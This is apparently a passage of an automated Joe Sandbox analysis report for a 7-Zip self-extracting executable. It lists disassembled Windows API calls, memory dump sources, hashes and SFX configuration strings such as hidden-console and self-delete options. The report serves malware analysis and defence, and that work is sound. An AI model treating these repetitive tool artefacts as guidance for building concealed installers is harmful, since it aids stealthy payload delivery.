• ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
• ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
• ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
• ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
• ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
• MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerWindowlstrcpymemcmpwsprintf$AttributesCloseCommandCreateCurrentDestroyDirectoryDispatchErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateVersionWait_wcsnicmpmemmovememsetwvsprintf
                                                                  • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                  • API String ID: 3696187633-3058303289
                                                                  • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                  • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                  • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                  • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                  • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                  • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                  • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                  • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 1799206407-0
                                                                  • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                  • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                  • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                  • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                  APIs
                                                                  • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                  • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeMessageSendSpace
                                                                  • String ID:
                                                                  • API String ID: 696007252-0
                                                                  • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                  • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                  • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                  • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                  • String ID: HpA
                                                                  • API String ID: 801014965-2938899866
                                                                  • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                  • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                  • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                  • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                  • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                  • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                  • DispatchMessageW.USER32(?), ref: 00401B89
                                                                  • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                  • DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                                  • String ID: Static
                                                                  • API String ID: 1156981321-2272013587
                                                                  • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                  • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                  • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                  • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                  • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@memcpymemmove
                                                                  • String ID:
                                                                  • API String ID: 3549172513-3916222277
                                                                  • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                  • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                  • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                  • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                  • String ID:
                                                                  • API String ID: 846840743-0
                                                                  • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                  • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                  • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                  • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                    • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                    • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                  • wsprintfW.USER32 ref: 004044A7
                                                                    • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                  • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                  • String ID: 7zSfxFolder%02d$IA
                                                                  • API String ID: 3387708999-1317665167
                                                                  • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                  • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                  • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                  • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                   Control-flow Graph

                                                                   • Entry block 408ea4-408ebf (calls 40aef3); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID: IA$IA
                                                                  • API String ID: 1033339047-1400641299
                                                                  • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                  • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                  • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                  • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                   Control-flow Graph

                                                                   • Entry block 410cd0-410d1a (calls 410b9a, free); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID: $KA$4KA$HKA$\KA
                                                                  • API String ID: 1294909896-3316857779
                                                                  • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                  • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                  • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                  • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                   Control-flow Graph

                                                                   • Entry block 4096c7-40970f (_EH_prolog, calls 4010e2); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • _EH_prolog.MSVCRT ref: 004096D0
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                    • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$H_prolog
                                                                  • String ID: HIA
                                                                  • API String ID: 3431946709-2712174624
                                                                  • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                  • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                  • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                  • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                   Control-flow Graph

                                                                   • Entry block 402844-40288e (calls 411c20, 40dcfb, lstrlenA * 2); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                  • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                  • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                  • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemcmp$memmove
                                                                  • String ID:
                                                                  • API String ID: 3251180759-0
                                                                  • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                  • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                  • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                  • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                   Control-flow Graph

                                                                   • Entry block 40150b-401561 (calls 408726, 401329, 401429, CreateThread); rendered graph not recovered (legend: Executed / Not Executed)
                                                                  APIs
                                                                  • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                  • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                    • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                    • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                    • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                    • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                    • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
